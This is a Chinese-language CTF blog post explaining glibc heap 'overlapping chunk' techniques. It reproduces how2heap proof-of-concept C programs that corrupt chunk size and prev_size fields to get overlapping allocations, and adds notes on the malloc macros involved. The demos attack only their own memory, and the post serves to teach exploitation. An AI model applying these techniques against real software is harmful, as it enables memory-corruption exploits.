How2Heap(2)-Overlapping

pwn heap

 2023/12/03 

mmap_overlapping

本质上也是劫持size或者prevsize，只是mmap比较特殊，直接走内核进行分配，释放也是直接用munmap。分配的chunk地址也会比较抽象元数据也不一样，看这个poc就都理解了，只是可能会在允许我们分配特别特别大的chunk的时候能用到。不过好处是只要内核mmap和munmap不改，这个overlap是全版本通用的。

#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
/*
Technique should work on all versions of GLibC
Compile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g`

POC written by POC written by Maxwell Dulin (Strikeout) 
*/
int main()
{
	/*
	A primer on Mmap chunks in GLibC
	==================================
	In GLibC, there is a point where an allocation is so large that malloc
	decides that we need a seperate section of memory for it, instead 
	of allocating it on the normal heap. This is determined by the mmap_threshold var.
	Instead of the normal logic for getting a chunk, the system call *Mmap* is 
	used. This allocates a section of virtual memory and gives it back to the user. 

	Similarly, the freeing process is going to be different. Instead 
	of a free chunk being given back to a bin or to the rest of the heap,
	another syscall is used: *Munmap*. This takes in a pointer of a previously 
	allocated Mmap chunk and releases it back to the kernel. 

	Mmap chunks have special bit set on the size metadata: the second bit. If this 
	bit is set, then the chunk was allocated as an Mmap chunk. 

	Mmap chunks have a prev_size and a size. The *size* represents the current 
	size of the chunk. The *prev_size* of a chunk represents the left over space
	from the size of the Mmap chunk (not the chunks directly belows size). 
	However, the fd and bk pointers are not used, as Mmap chunks do not go back 
	into bins, as most heap chunks in GLibC Malloc do. Upon freeing, the size of 
	the chunk must be page-aligned.

	The POC below is essentially an overlapping chunk attack but on mmap chunks. 
	This is very similar to https://github.com/shellphish/how2heap/blob/master/glibc_2.26/overlapping_chunks.c. 
	The main difference is that mmapped chunks have special properties and are 
	handled in different ways, creating different attack scenarios than normal 
	overlapping chunk attacks. There are other things that can be done, 
	such as munmapping system libraries, the heap itself and other things.
	This is meant to be a simple proof of concept to demonstrate the general 
	way to perform an attack on an mmap chunk.

	For more information on mmap chunks in GLibC, read this post: 
	http://tukan.farm/2016/07/27/munmap-madness/
	*/

	int* ptr1 = malloc(0x10); 

	printf("This is performing an overlapping chunk attack but on extremely large chunks (mmap chunks).\n");
	printf("Extremely large chunks are special because they are allocated in their own mmaped section\n");
	printf("of memory, instead of being put onto the normal heap.\n");
	puts("=======================================================\n");
	printf("Allocating three extremely large heap chunks of size 0x100000 \n\n");
		
	long long* top_ptr = malloc(0x100000);
	printf("The first mmap chunk goes directly above LibC: %p\n",top_ptr);

	// After this, all chunks are allocated downwards in memory towards the heap.
	long long* mmap_chunk_2 = malloc(0x100000);
	printf("The second mmap chunk goes below LibC: %p\n", mmap_chunk_2);

	long long* mmap_chunk_3 = malloc(0x100000);
	printf("The third mmap chunk goes below the second mmap chunk: %p\n", mmap_chunk_3);

	printf("\nCurrent System Memory Layout \n" \
"================================================\n" \
"running program\n" \
"heap\n" \
"....\n" \
"third mmap chunk\n" \
"second mmap chunk\n" \
"LibC\n" \
"....\n" \
"ld\n" \
"first mmap chunk\n"
"===============================================\n\n" \
);
	
	printf("Prev Size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-2]);
	printf("Size of third mmap chunk: 0x%llx\n\n", mmap_chunk_3[-1]);

	printf("Change the size of the third mmap chunk to overlap with the second mmap chunk\n");	
	printf("This will cause both chunks to be Munmapped and given back to the system\n");
	printf("This is where the vulnerability occurs; corrupting the size or prev_size of a chunk\n");

	// Vulnerability!!! This could be triggered by an improper index or a buffer overflow from a chunk further below.
	// Additionally, this same attack can be used with the prev_size instead of the size.
	mmap_chunk_3[-1] = (0xFFFFFFFFFD & mmap_chunk_3[-1]) + (0xFFFFFFFFFD & mmap_chunk_2[-1]) | 2;
	printf("New size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-1]);
	printf("Free the third mmap chunk, which munmaps the second and third chunks\n\n");

	/*
	This next call to free is actually just going to call munmap on the pointer we are passing it.
	The source code for this can be found at https://elixir.bootlin.com/glibc/glibc-2.26/source/malloc/malloc.c#L2845

	With normal frees the data is still writable and readable (which creates a use after free on 
	the chunk). However, when a chunk is munmapped, the memory is given back to the kernel. If this
	data is read or written to, the program crashes.
	
	Because of this added restriction, the main goal is to get the memory back from the system
	to have two pointers assigned to the same location.
	*/
	// Munmaps both the second and third pointers
	free(mmap_chunk_3); 

	/* 
	Would crash, if on the following:
	mmap_chunk_2[0] = 0xdeadbeef;
	This is because the memory would not be allocated to the current program.
	*/

	/*
	Allocate a very large chunk with malloc. This needs to be larger than 
	the previously freed chunk because the mmapthreshold has increased to 0x202000.
	If the allocation is not larger than the size of the largest freed mmap 
	chunk then the allocation will happen in the normal section of heap memory.
	*/	
	printf("Get a very large chunk from malloc to get mmapped chunk\n");
	printf("This should overlap over the previously munmapped/freed chunks\n");
	long long* overlapping_chunk = malloc(0x300000);
	printf("Overlapped chunk Ptr: %p\n", overlapping_chunk);
	printf("Overlapped chunk Ptr Size: 0x%llx\n", overlapping_chunk[-1]);

	// Gets the distance between the two pointers.
	int distance = mmap_chunk_2 - overlapping_chunk;
	printf("Distance between new chunk and the second mmap chunk (which was munmapped): 0x%x\n", distance);
	printf("Value of index 0 of mmap chunk 2 prior to write: %llx\n", mmap_chunk_2[0]);
	
	// Set the value of the overlapped chunk.
	printf("Setting the value of the overlapped chunk\n");
	overlapping_chunk[distance] = 0x1122334455667788;

	// Show that the pointer has been written to.
	printf("Second chunk value (after write): 0x%llx\n", mmap_chunk_2[0]);
	printf("Overlapped chunk value: 0x%llx\n\n", overlapping_chunk[distance]);
	printf("Boom! The new chunk has been overlapped with a previous mmaped chunk\n");
	assert(mmap_chunk_2[0] == overlapping_chunk[distance]);

	_exit(0); // exit early just in case we corrupted some libraries
}

这里就是通过修改低地址处mmap chunk的size进行释放后再次分配出来从而获得一个chunk内部可操作指针。

POC/EXP

How2heap上有两个Overlapping的实例,阅读了源码之后发现本质逻辑是相同的，这里先一起贴出来：还有一个是mmap的overlap，只在分配大小大于MMAP_THRESHOLD的时候用，mmap chunk的元数据以及分配和释放都涉及到系统调用和内核的内存管理并不参与一般的堆分配。单独放在前面

/*

 A simple tale of overlapping chunk.
 This technique is taken from
 http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main(int argc , char* argv[]){


        intptr_t *p1,*p2,*p3,*p4;

        fprintf(stderr, "\nThis is a simple chunks overlapping problem\n\n");
        fprintf(stderr, "Let's start to allocate 3 chunks on the heap\n");

        p1 = malloc(0x100 - 8);
        p2 = malloc(0x100 - 8);
        p3 = malloc(0x80 - 8);

        fprintf(stderr, "The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);

        memset(p1, '1', 0x100 - 8);
        memset(p2, '2', 0x100 - 8);
        memset(p3, '3', 0x80 - 8);

        fprintf(stderr, "\nNow let's free the chunk p2\n");
        free(p2);
        fprintf(stderr, "The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");

        fprintf(stderr, "Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
        fprintf(stderr, "For a toy program, the value of the last 3 bits is unimportant;"
                " however, it is best to maintain the stability of the heap.\n");
        fprintf(stderr, "To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse),"
                " to assure that p1 is not mistaken for a free chunk.\n");

        int evil_chunk_size = 0x181;
        int evil_region_size = 0x180 - 8;
        fprintf(stderr, "We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
                 evil_chunk_size, evil_region_size);

        *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2，UAF

        fprintf(stderr, "\nNow let's allocate another chunk with a size equal to the data\n"
               "size of the chunk p2 injected size\n");
        fprintf(stderr, "This malloc will be served from the previously freed chunk that\n"
               "is parked in the unsorted bin which size has been modified by us\n");
        p4 = malloc(evil_region_size);

        fprintf(stderr, "\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size);
        fprintf(stderr, "p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x80-8);
        fprintf(stderr, "p4 should overlap with p3, in this case p4 includes all p3.\n");

        fprintf(stderr, "\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
                " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");

        fprintf(stderr, "Let's run through an example. Right now, we have:\n");
        fprintf(stderr, "p4 = %s\n", (char *)p4);
        fprintf(stderr, "p3 = %s\n", (char *)p3);

        fprintf(stderr, "\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
        memset(p4, '4', evil_region_size);
        fprintf(stderr, "p4 = %s\n", (char *)p4);
        fprintf(stderr, "p3 = %s\n", (char *)p3);

        fprintf(stderr, "\nAnd if we then memset(p3, '3', 80), we have:\n");
        memset(p3, '3', 80);
        fprintf(stderr, "p4 = %s\n", (char *)p4);
        fprintf(stderr, "p3 = %s\n", (char *)p3);
}

实例2是这样的：

/*
 Yet another simple tale of overlapping chunk.

 This technique is taken from
 https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf.

 This is also referenced as Nonadjacent Free Chunk Consolidation Attack.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main(){

  intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
  unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
  int prev_in_use = 0x1;

  fprintf(stderr, "\nThis is a simple chunks overlapping problem");
  fprintf(stderr, "\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n");
  fprintf(stderr, "\nLet's start to allocate 5 chunks on the heap:");

  p1 = malloc(1000);
  p2 = malloc(1000);
  p3 = malloc(1000);
  p4 = malloc(1000);
  p5 = malloc(1000);

  real_size_p1 = malloc_usable_size(p1);
  real_size_p2 = malloc_usable_size(p2);
  real_size_p3 = malloc_usable_size(p3);
  real_size_p4 = malloc_usable_size(p4);
  real_size_p5 = malloc_usable_size(p5);

  fprintf(stderr, "\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));
  fprintf(stderr, "\nchunk p2 from %p to %p", p2,  (unsigned char *)p2+malloc_usable_size(p2));
  fprintf(stderr, "\nchunk p3 from %p to %p", p3,  (unsigned char *)p3+malloc_usable_size(p3));
  fprintf(stderr, "\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));
  fprintf(stderr, "\nchunk p5 from %p to %p\n", p5,  (unsigned char *)p5+malloc_usable_size(p5));

  memset(p1,'A',real_size_p1);
  memset(p2,'B',real_size_p2);
  memset(p3,'C',real_size_p3);
  memset(p4,'D',real_size_p4);
  memset(p5,'E',real_size_p5);

  fprintf(stderr, "\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n");

  free(p4);

  fprintf(stderr, "\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n");

  *(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE
  //本质一样，关注这个evil_size是怎么算出来的，实际可写空间之和+最低位prev_inuse位的1（non_mainarena和is_mmapped为0）再加上一个headsize0x16

  fprintf(stderr, "\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n");
  fprintf(stderr, "\nThis operation will basically create a big free chunk that wrongly includes p3\n");
  free(p2);

  fprintf(stderr, "\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n");

  p6 = malloc(2000);
  real_size_p6 = malloc_usable_size(p6);

  fprintf(stderr, "\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n");
  fprintf(stderr, "\nchunk p6 from %p to %p", p6,  (unsigned char *)p6+real_size_p6);
  fprintf(stderr, "\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3);

  fprintf(stderr, "\nData inside chunk p3: \n\n");
  fprintf(stderr, "%s\n",(char *)p3);

  fprintf(stderr, "\nLet's write something inside p6\n");
  memset(p6,'F',1500);

  fprintf(stderr, "\nData inside chunk p3: \n\n");
  fprintf(stderr, "%s\n",(char *)p3);


}

原理分析

首先，这个漏洞能实现的原理是因为glibc中关于chunk一些基本操作的宏本质上是通过一个指针+读取当前chunkhead中的信息实现的。例如next_chunk(p)是这样定义的：

1 2	/* Ptr to next physical malloc_chunk. / #define next_chunk(p) ((mchunkptr)(((char ) (p)) + chunksize(p)))

还有更多的：

prev_chunk

/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)

/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
#define prev_chunk(p) ((mchunkptr)(((char *) (p)) - prev_size(p)))

是否使用：

1 2	#define inuse(p) ((((mchunkptr)(((char *) (p)) + chunksize(p)))->mchunk_size) & PREV_INUSE)

所以，overlapping或者说extend/shrink本质上是劫持chunkhead信息中的size域或者prevsize域，来达到欺骗程序，从而操作相邻chunk中内容的目的。

在演示复现中，上面两个程序都是使用了UAF覆写了chunk的size域，将其写为一个更大的值（一般是可用空间之和+0x10的headsize），这样在free的时候，就会将原本物理地址相邻的两个不同chunk视为一个大chunk进行释放（放入unsortedbin中）。然后通过malloc一个两chunk可用空间大小之和大小的chunk，就可以得到我们的overlapping大chunk，换言之就是分配得到了一个包含另一个chunk的更大的chunk，从而实现数据的覆盖写入。实际操作和题目中，可以使用堆溢出来试着实现这一点。

另外，时刻脑子里要有一个堆分布的概念，尤其是是否和topchunk相邻。这个漏洞与bin的种类没有太大关系，只是在fastbin_size范围内时由于prev_inuse存在首个chunk不会轻易和top_chunk合并

参考CTFWiki的说法，这种漏洞也被称为chunk_extend/shrink。核心原理既然是覆盖chunkhead，那我们能做的就不止有覆盖size域一种做法了，还可以覆盖prev_size来进行前向的overlapping，下面是一些可能在how2heap基础上进阶的用法。（来自CTF_Wiki）

首先这个漏洞可以先修改再释放也可以先释放再修改，最终效果是一样的。
前向overlapping：

int main(void)
{
    void *ptr1,*ptr2,*ptr3,*ptr4;
    ptr1=malloc(128);//smallbin1
    ptr2=malloc(0x10);//fastbin1
    ptr3=malloc(0x10);//fastbin2
    ptr4=malloc(128);//smallbin2
    malloc(0x10);//防止与top合并
    free(ptr1);
    *(int *)((long long)ptr4-0x8)=0x90;//修改pre_inuse域
    *(int *)((long long)ptr4-0x10)=0xd0;//修改pre_size域
    free(ptr4);//unlink进行前向extend
    malloc(0x150);//占位块

}

这个前向overlapping是利用了unlink机制实现的。先将prev_inuse位置为零，这样在free一个smallbin大小的chunk的时候会检查其前后是否能够合并，prev_inuse被置零就导致其会以prev_size为指导将p和前一个chunk合并。总之在遇到题目的时候再来更新这里吧。

二编：沟槽的自己把自己绕晕了。首先我们知道64位下chunk是16字节对齐的，size域必定是0x_0这样的形式。我们说的NON_MAIN_ARENA, IS_MMAPPED和PREV_INUSE三位“最低位”，由于小端序的关系

Next Post

Rust？Rust！(1)
Previous Post

逆向杂谈（持续更新）

CATALOG

1. mmap_overlapping
2. POC/EXP
3. 原理分析